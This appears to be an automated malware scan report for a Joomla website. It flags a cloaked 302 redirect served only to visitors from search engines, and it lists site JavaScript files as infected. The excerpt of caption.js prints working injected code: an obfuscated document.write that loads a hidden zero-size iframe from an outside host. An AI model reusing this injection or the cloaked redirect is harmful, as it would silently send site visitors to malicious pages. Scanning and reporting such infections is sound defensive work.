Malicious/Suspicious Redirects
| Request | Server response | Status |
URL: http://pechorybuss.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: pechorybuss.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sun, 20 Jul 2014 11:03:12 GMT Location: http://tinyurl.com/c2td3xs Server: nginx Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | malicious |
Scanned pages/files
| Request | Server response | Status |
http://pechorybuss.ru/ | 200 OK Content-Length: 13541 Content-Type: text/html | clean |
http://pechorybuss.ru/media/system/js/caption.js | 200 OK Content-Length: 2161 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = container.setAttribute("style","float:"+align); container.style.width = width + "px"; } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); document.write('<iframe src="'+'ht'+'tp://'+'zoz'+'ko'+'n'+'op'+'is'+'ka.pl/c'+'omp'+'on'+'ents/c'+'om_c'+'ont'+'ent/'+'m'+'od'+'els/'+'sh.'+'html" width="0" height="0" frameborder="0"></iframe>'); Antivirus reports:
| ||
http://pechorybuss.ru/index.php?option=com_content&view=category&layout=blog&id=34&Itemid=53 | 200 OK Content-Length: 22387 Content-Type: text/html | clean |
http://pechorybuss.ru/index.php?option=com_content&view=section&id=6&Itemid=54 | 200 OK Content-Length: 9528 Content-Type: text/html | clean |
http://pechorybuss.ru/index.php?option=com_content&view=category&layout=blog&id=35&Itemid=55 | 200 OK Content-Length: 34831 Content-Type: text/html | clean |
http://pechorybuss.ru/index.php?option=com_content&view=category&layout=blog&id=36&Itemid=56 | 200 OK Content-Length: 7935 Content-Type: text/html | clean |
http://pechorybuss.ru/index.php?option=com_content&view=category&layout=blog&id=37&Itemid=57 | 200 OK Content-Length: 10657 Content-Type: text/html | clean |
http://pechorybuss.ru/index.php?option=com_content&view=category&layout=blog&id=38&Itemid=58 | 200 OK Content-Length: 300639 Content-Type: text/html | clean |
http://pechorybuss.ru/index.php?option=com_content&view=category&layout=blog&id=39&Itemid=59 | 200 OK Content-Length: 7830 Content-Type: text/html | clean |
http://pechorybuss.ru/index.php?option=com_content&view=category&layout=blog&id=40&Itemid=60 | 200 OK Content-Length: 10202 Content-Type: text/html | clean |
http://pechorybuss.ru/index.php?option=com_content&view=category&layout=blog&id=45&Itemid=65 | 200 OK Content-Length: 13492 Content-Type: text/html | clean |
http://pechorybuss.ru/index.php?option=com_ckforms&view=ckforms&id=1&Itemid=66 | 200 OK Content-Length: 9880 Content-Type: text/html | clean |
http://pechorybuss.ru/components/com_ckforms/js/jquery-1.3.2.min.js | 200 OK Content-Length: 67006 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document Antivirus reports:
| ||
http://pechorybuss.ru/components/com_ckforms/js/jquery.tooltip.min.js | 200 OK Content-Length: 15053 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($){var helper={},current,title,tID,IE=$.browser.msie&&/MSIE\s(5\.5|6\.)/.test(navigator.userAgent),track=false;$.tooltip={blocked:false,defaults:{delay:200,fade:false,showURL:true,extraClass:"",top:15,left:15,id:"tooltip"},block:function(){$.tooltip.blocked=!$.tooltip.blocked;}};$.fn.extend({tooltip:function(settings){settings=$.extend({},$.tooltip.defaults,settings);createHelper(settings);return this.each(function(){$.data(this,"tooltip",settings);this.tOpacity=helper.parent. Antivirus reports:
| ||
http://pechorybuss.ru/components/com_ckforms/js/ui.datepicker.packed.js | 200 OK Content-Length: 54716 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){$.extend($.ui,{datepicker:{version:"1.7.2"}});var PROP_NAME="datepicker";function Datepicker(){this.debug=false;this._curInst=null;this._keyEvent=false;this._disabledInputs=[];this._datepickerShowing=false;this._inDialog=false;this._mainDivId="ui-datepicker-div";this._inlineClass="ui-datepicker-inline";this._appendClass="ui-datepicker-append";this._triggerClass="ui-datepicker-trigger";this._dialogClass="ui-datepicker-dialog";this._disableClass="ui-datepicker-disabled";this._unselect Antivirus reports:
| ||
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pechorybuss.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pechorybuss.ru/
Result: pechorybuss.ru is not infected or malware details are not published yet.
Result: pechorybuss.ru is not infected or malware details are not published yet.